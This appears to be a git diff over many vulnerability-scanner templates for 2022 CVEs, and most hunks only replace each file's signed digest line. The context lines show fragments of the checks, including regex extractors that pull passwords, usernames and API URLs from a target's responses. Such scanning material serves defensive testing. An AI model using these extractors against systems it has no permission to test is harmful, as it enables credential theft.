@@ -66,4 +66,4 @@ http: - '"password":"(.*?)"' - '"username":"(.*?)"' - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' -# digest: 4a0a00473045022100b6eaad94ff3878067cbf35ebf2e98041d29ea00cd548a6acc1cebf8170545ff5022011109ec67dc75367e14a57c39726ee1cd3150458963d5a36b4ea0a51e0b68769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a139554a17ea123a9c2e59ac77e260256394de84e1c3b6d88004efe8dd0340da022100f744af2af84e2ab78fc970895b8702d5bc14aa4035a42ef57fbf3094b3c5a6cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 9f70167191..ea748b23ee 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml @@ -44,4 +44,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022100daa8547f82c8615b2d03d8541ff37de1f91c24cf042872c4954ab90b80af5a050220345d77954918025528c4ca7435b98169569b646c348d133e3290273d1c16e42d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c23beee17ba96dc0ff0bbdc4e7172549f786fda33dbfa8ab2e4d40c063b36d402203fd354fae09d18db6b7b35b96a5a3b15e620529582d196bfe0246a76b794c5df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 184bb6a231..5a85695798 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220089ea67dd284fdc9cb5f8561b1d4bfc2fa8b0ba255e1fe4da91db549c933880402206b98099cbbb46f8c4ce87cdf7839a7b3cbd0a01ebb6f36669538d9351f172edd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b4b9c8dfcab221022bb0d4a2727a6b2bae6322db192f2af2a2495c41392c374022040634084bcf37acc6ec71da2bda623a95ee97401d0ff98f888189eb118432ce8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 3020195c6b..88e5a6bcce 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "CVE-2022-26352")' - 'status_code_2 == 200' condition: and -# digest: 4a0a004730450221009c0b8e26c1757e843516d1eb93bbf57c5a4c28cc367a24ab2913efc1c620261f02203b7f5ecae948b47821751b0eb7531ddf83eceedbcf0ad01c51e5710a9da998bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022006eb8034d180b3eabffdbf06565b45fc69bb1c4450f178265c93beab35ef6080022100f7986c839f4fe16268ddce0e6079a2b747faa6b8491461e1443f0992895f40ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index a5456732af..35c3711134 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cce687826fa0938f4944c77a726102f036638a7225beea50d91d7f4aba881ee4022100d38d31a915a08dd7ac2ccff9c5cdb5683ccf782cc375359389be457f415998d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f494969b3cc5f33d89895aaa1019413558aea5e0a17ad9d8af9c32823b6d5ae022100b8061bac44fe499f3f4c26f9e9ffc65e5876b89124e7fd9c837cde68a62bac3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index 09b54bd0a5..b8894b570b 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008b2b1617febe8dccc10821928bbfc6ef217f8c13d190a4e1331680c32dce97eb02206ef9889f401735822755bfeff09044d1c95a75aaa4f9225590a5d412ec8ef929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c75ba9530d113f2971d361995586fc109d3e1f101ce09dfcff8cb6a9b68200e202206c6367e9f7bc6c8f36edbb155245b907e5a38f00bb3b531b1d42a3bd0c62936b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index 14498c83d0..d4b4996a49 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b51a2dee0a9598c7c1f521f9373c5bb35728dda0693010a4db82ab044f7124d4022006a5200a4741c2b9c8d1102b86fd448d48abe1e0af4e543f0ea00920ed47e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026f3102461fdfb8ad42d0fffcee676354eaeeabe665e8b6057eac540c0f72518022100b5dfbce7dde7ac93f7894809911d03705c9e3046a2ee41a85a93a23fc8fc38fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index eb1dc1072b..082f8d651a 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022067808d2ef89464f8783342be709967c65dd881e44614eb5c38c240f26f031a7c02201f9e9db2f41292d877197f390bc061a2bf455dc58d83e13a92b5baa0612b7cc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206cde04a8da90af417c4d338648289d7fe1dde9782b7a4126776323c0d3214962022100e1f686dceb03fe6c36fcd93c7d212f1c9db005af4dec4dd487ffa5f8512adaf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index 56de6e769d..be6fdc39ce 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -84,4 +84,4 @@ http: regex: - coverupload.(.*?).png internal: true -# digest: 4b0a0048304602210085857e4680115374eb6a9159f4e37003a795b63ad4ad57ea849bb25b04ec899c022100ceac60030e13ddb109cf88cfcaf3066ff8140a87aed39031c9429979c6d07952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d2b0781d5fb5680bd80c25aa75a1d244545d1a91e342d2f00ec8ca3dad09dac7022100ce03a1d3257427eb3be47bc250cad3810df7010fa41412ce1a0046bbc5c4451a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index 0af9290eb8..90e837297d 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022029ff7ca9eec78f978cca636c260d69c4dd0975c46068c8d981049465b985c390022100d935e9c82c8fbb7d5cf9b1a5ffaef6ff36ceb942e8d2df6a703342de6a8c829e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dde3b3f87bc1e1e8b399e7e997452bd588d1da963f0777b7200ab72e3caf202c022100b31c35665d25b79eb84796f8665548dd773109f208318662aa9e311f148c5798:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index 1ee4a12aa3..091d447707 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a1b0cf5101917cedd767e55813f4fda7435be450388a3f0676ddc42e7cb029a5022100db84abf0b399ac4fe86c377eff7301138cc347dfaf7f20244626e67bd02e9945:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b9ed67f3c70c7108d30f3c1f1e2ee437b1987825aafc5fb301c3292ff64dbcf9022075f815b5732c5053302ff69bb0c126ea89d30fcfef401ff095e8daab0aed2a59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml index d37c37737c..d2d35ad63c 100644 --- a/http/cves/2022/CVE-2022-28023.yaml +++ b/http/cves/2022/CVE-2022-28023.yaml @@ -48,4 +48,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "status\":\"success")' condition: and -# digest: 490a0046304402202679435e70ec7ff77e6356d469e8b023129f6b3378ff568e3d494c06c9bd77530220519ab2ca116d285eff6637fc9215b435f91e6d061fdfc904ee37adad8e051fd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1b076f7cdfb320f0d71c0f505593b36b406e9e696bb737f0a0d61388ad61e80022100c896c24e641121b1bff83ab1240ae92d23978d4f6a153271867759af201479fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index 9d865a26ec..0284ea0ab6 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -43,4 +43,4 @@ http: - 'status_code == 200' - 'contains(body, "Page Deleted")' condition: and -# digest: 4b0a0048304602210094d3f24fad25a6ad53537e08fc90fcff2bc0b990b179300cf9ca237b2cb0ddc0022100b1f33b959d642b04732cc8fa792d91295bd120f8cef3e993037a2ebf0ab3665c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035872b6d7631a79d5c0340f1748e96c6f32bb14452d739b7328ab7569395d7410220522677dc575129449d52db8a8b80bad1a914e1cf674585d5dde9e1a75af21971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index c4d4251323..6b0e2ff255 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100ad3280dd169fc265e15a1fb1734bb88fbfe21000ca36ebab37d25784e71c6416022100a02f6644e9b1a7fd03fc3523742435de169ba87b7c110db223a9010dad57fa2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1785587cac15cd8858bff3c9e18d1cd6abb152301f1ac7f776e5e73c988ed3d02210083e743db669b0cf972fbdb7c27f1c4356e475b32c7ab382254bbe138d7516aa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index 3866b93571..f86a4440bf 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -79,4 +79,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f49180b6302f9fef0412af1682487a99e8e841803be35372ea552f7878da30e022034287c08d99ef3e984b6ba91845fc4b18462d620c01f5ea9326718da215d237f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029c95f4a6b5c8347d8b89c49ffb5e91511ad25e59a2424f916205cfd65c15116022051f90662aff17ed22a874e462509b8be55512460e94d0cdb45b9159ec7b963fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index 72823ef3e3..e2b2ad35dd 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -83,4 +83,4 @@ http: - csrf_token" value="([a-f0-9]{64}) internal: true part: body -# digest: 4b0a00483046022100b936ab16d4511ae94e20920ea423189e833767cd09607b9fd39ae31767758827022100e19df53050f82f76d6172e2c94eb2f93c01f249e4ce37a65a2e05d4c7624ba12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c478d1e0197d2ba9be55f4d0cce98fbfcdecb2638c195874caef03d19fc1e66f02201ab42483cfdd1aa7a57ab5b0886384ed8d16c20ca594c7359976e236b063128e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index 9b756bc315..a1abe5b0a7 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -66,4 +66,4 @@ http: part: body words: - "ManageEngine" -# digest: 4b0a00483046022100adfe043ed717eb4c2bd34e54d594afa7fcd27ffa6a5abaa6d34ae8fe396dcd53022100ad5db93b3daf8c1043b3d88354716768831713fd53728c5fe7d83373dbdca6b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e3d36d51ec843b9dc692e7dee0dc6a720a7809238687406c9b6c9adec2565bd022100f2adb52392fc8ccc65f42b78866b482d716c041de0ba2d986e9fc4bc659f7993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index f5b8472aed..c4c63a5174 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210083399ab30c18aa4ee9e8a8dc77c6a1dc50feb2092036ee0a9fea49eba0c770a4022100aba47004ae87a814261cb712697ce39cb06ac5da29c432abb75c5ec9fac9738c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041e17195389fb0056bcfda90a39dae02b42142afa5777111be172b65a6229c13022100ba206861beb7c0bdb9e3c6fa4f3200001d1bab4257f6242ed471b513864b9198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index 11c85365ba..6eb13e21e4 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009238cd94d4ea391e4ba3a8fd9b6b9e4d2b1b35ea6b4618985cbd7679ba6c26aa022046b75d3e44aef88da8a1c3a43d4d2f499141f72031f265049c0993976f2531de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b622de9ce93ab8761ccb9271542697a6657cc958cf6eb6d5950cbccf9d55d54d0220260b002fb28be7bf8c3cbfd45485e6875a123f7a7f60e1151e124a16fad1456b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index 5ba768a99d..1a65795483 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -64,4 +64,4 @@ http: - '"_ajax_nonce":"([0-9a-z]+)"' internal: true part: body -# digest: 4a0a00473045022100fbf116fc126c32cb636b41b96e4869401ddff061cb73fbccdef08cfaab0c1e8202205d457dcc5c48196ab73bbbe156a7df100c74e1dc1279c0467df579ebe105a8f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b24f378b2c15e4a80c536ce9df05a94c3cabe81bb8e1eb19e344fcff19b3953022100f8e4e6c2e550b6fc7afb7c79ceae5d335310de4900ce7b2fb357c5ea265a0c6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index ece6c2a890..126a2daab7 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022009d76438f14aca1cbc33ea695332b672ebdff31d2dba9171ba069cdf40c9b226022014e620a8fe211c0a70a706c03df6e4bd5961dff7ba59ca7bcb8c2c869e063a28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207de2683e873cdac05f87e487046f2d887d5e63a42e23bfffe37e26eb602daa73022100c4b0f00b4792e8df7ba345ff741ad3745b2196aaf208a0b0cd8760d5a86025b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index b89b7124a5..e20ad71c6a 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d9e1bedfff4118b3279485a5986c26b55fb4f70309678e686a3a2f739891d72402210097dbc2e593923e391651673ae5b43eb1eb8fca5089adec8517b32b625de2b72e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b66799841a5620fc96b4e17cc465b017f69905afc9125aebd6e1c3d2642509f0220700182ede207e46171582ad84a1ae1bcb553d33b160b8f347d0c6d9441057b72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index 60bada6a89..26490063a8 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -60,4 +60,4 @@ http: - 'status_code_3 == 200' - contains(body_3, 'admin-name\">{{str}}') condition: and -# digest: 4a0a0047304502200260f1d81ea298c0298f44f3ef3ee75de3c2779b7870077c7a54c55526f150e6022100b1cfcd5b8d8da68b83cab3ce4e5bbf99f031a927741f508f1c641d219ffe5719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100acfc88fbb67d2cd5843df7db44031e80d4a2fd12170e0c9205adb18f6081f720022100c8df692fe6c6ee79c6cf269b63c7fae88c0b48be07ca0fdc16731a06f62d23c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 3aa3bf5b6e..f90bd6b2bc 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b032a0928542b07c129e656f021862237782c6d5334e70b894ab4ebcca9585c4022100f96c4c46eee96e11abe556a475886c305dbe89a53f3ba87b4a652358759cead5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b77fdc0e3ddf8c8bc57ec5a424048ad33578c5a442f8570831738bd54171d38002207fe758e52bbb68d686119cde5763c863fed543019e5fcb412fb951e7b82ba8fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml index 10e67c06fc..4791e1ff5a 100644 --- a/http/cves/2022/CVE-2022-29007.yaml +++ b/http/cves/2022/CVE-2022-29007.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220552b4e4f1d6369c8da564385c27795297aaf3b1f860d3b125ab77765ac1032b60221009429073918c60b64bc35a1f86bcedf480353c7fc21d5f1363a841d0a24dd02d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c83e9d222849e81f3fb3d97e70cbd890771c80f19edb39f41c5893845fe26ec7022100fe965f23bff4bf73806c8ab70ccbac15066128210d499421fdc12544efe61d21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index 8ac7e7ccac..25114843fb 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c4332b09e1cc097f4cca16a0121cafbffab109672f9245168e86edf8bf26a0c902210099acc93d9117952cce48b5e857f1d8151fc10df6beebece0164404381d30a846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000db0cd0885747935dbc46e33eb6d39fe6e402cd98a32c27aace125930bb5e02022033d3891f676061411566d32cc3a2628d0bb645c1dbb89d4da9deaf4ec4781f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29013.yaml b/http/cves/2022/CVE-2022-29013.yaml index 27c001979f..bb4e940017 100644 --- a/http/cves/2022/CVE-2022-29013.yaml +++ b/http/cves/2022/CVE-2022-29013.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207cbb58a7c97c66bfec2ae1b2ea9efe5dd2c11d2f9ce7517c4f72aa7e6508b86002204dbae1299fc556dc6cc9ac476fb7c9c775c572f5aff45a220b6738b28985bd35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220110ece90c552286c24275c2bed1e476aaf125bd1e88aa73d6231ada8c3a7d5e3022100cb24d2c8d63917c983e839ee3e8596a4d8dd067b2be44d13a3e229e15a806aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index e1b06ad89f..f95cafd172 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fa422597b17ed8103daea7b9b7c129502f25b691034e1c73b5e6f98089537455022042b8117c0c1f7a96f5dfed6a5cc2244e045d23ecfb50bd7a34715f8bf79b1d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022034aff64154b2b68ec30a164da469d16aa15387ce3d24676fb525864618d93cc302205fed4749cfb4201b9206d98b654c1109275383c56007c6ab53c3499683543033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index 9154676875..5d38f23550 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -48,4 +48,4 @@ http: part: body words: - You are viewing page number -# digest: 4a0a0047304502203db3f45d8e15e58d60c2a0c268f52014feead1fa99568158768c91a2580e313b022100efb19def318800319766279d5e0fbf144650bf5b861b85f3f6bfa291878bd107:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afb6acf46e188f010c99e8bddfbd508e62a1c34e3de7cc56d83a8538a16929f602200b75c244bf4ca105f25c7fdd2fc3ac5482cd4b7fdd21ca483cb95ffe11520409:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index e0f0a073a9..5145a0635b 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100ad57775f28b340323e6c238f83d7ff7d527ca0f9ea5bad34f1516a2ced3e64c7022057c3fb9256242477b86e3a94db3ab1e5b0992646c61019b6e2eb284ae7e03696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c3958c2c011954e33399bf7bbb65931a43f437a82f6ccf7407b9db4222e85447022100e2d0cf9d7028f557f4dc83c56caf8cc23310112abd333fe0ee21746c6d29398f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index 3b6365097a..9a4b9d84ab 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -62,4 +62,4 @@ http: - "" internal: true part: body -# digest: 4a0a00473045022100cbdf04a44be30b745acc991c58c7b30bd5887bf49b11309c5a3e02a096fa0d0a0220210e11532a685f0239900f6aab1e5862ec23a6a9c30af08dda63ee08c7bd2ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201426a56cfb1ab3a352f1f1604646839ac31e772a168ec6bb1d200bc2013433ce0220086f2bed2bdfbc803b4ea906fd4cc4e9d57bc183c59bc216e86aef876d19fc73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index b4868355be..fa1e4c5e5b 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078d081edda1941e7be81d051567065c4e396282660f623323433ef782d79da2902205556917e13179bce84c0fd7d72192302ad7189776bf60aa56d15335d18521f44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205da79e19dbf42fb4a7fc28766ee1e0da9a23958c5c0bfd57073840286d9f500b02204d3d7749e0da21b52ce93cc9de4bbbc17a65d9a761c5f4a466a4596caaabe6cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index a4ab37242f..f521195e84 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -56,4 +56,4 @@ http: part: body words: - "p1_network_mail.cgi" -# digest: 4a0a00473045022100cfdae160b8d20debb49ab77a03efc5984e3595e0738b0153de27449eb8cf254c022008bf10a1ac0f9b524841d022daae36b4b0b105ddae1296e300fb87c886200617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b70e613d09fa2a711de3a0758614accfd68df4921aaf5b9ada5d295416866de702201e1dcb85461c584db1a0e90896dda04b3f751d8b0033b089fd5eaf0119138cc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index e79c758f4d..28da09bfa3 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008ef58e2fe8d3135a84c8de1c0e8768da7b5e0d6b8ad3771ae9495f44cdff423302201139897fc4641b2c9df1965cd6cefb0377632f5366b8f0e0c20be07316136cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027dc1fba3357657f2339307312517be5c53ff3f1e231f085435c34330d69fc08022100ba2b369ebf9eecb75fbdd2bb7025b70b4298bb0ce1017bd3edf20f3a4aa6e17c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index 5ba976405e..b8bd54deeb 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -55,4 +55,4 @@ http: - type: dsl dsl: - "contains(body_2, 'WSO2-RCE-CVE-2022-29464')" -# digest: 4a0a0047304502206626d39352045dab0703dbd61d9cecafd6e7f18e8d9316bef52d936ca126b399022100d448de4461fe4835998a05ef187668142f89f7025b11abe66e0e3305508c1171:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200dd50ee86b21136b9d8fc38b35acb9a7800dcd74b828eb589b4ea9d724b97486022100ce0263089519776aefede01c382dd8d1424c666227ac596b5f7331dd3c561059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index a53b6d6ba5..d1d83d95df 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f74f191103aed5a55a87b64ed54d8e3f2c3a84f48f2853428d9af571e0cd877702201a9a8a865260835250bcde79a6d3fd03166539ac2f673fd0a73386d219f510e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0daab3631f2436ac3fedaa0e30b87d965c744a64438c8d7a23a9e6cfdf7d86402202fedf1fa413e80ab071388a7442509adbad1a2fae90dbd04acf08d7d190531d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index 331b043b0a..ce8893b72c 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202266b24b3ca73622ae1a9a90ed2ca8a2800fd51395203f79212cca3efcca657c022072817838ecc6d8bcfbefc1ed8b599b073956b1ea37fbd0821541a08b1e56798d:922c64590222798bb761d5b6d8e72950 \ No 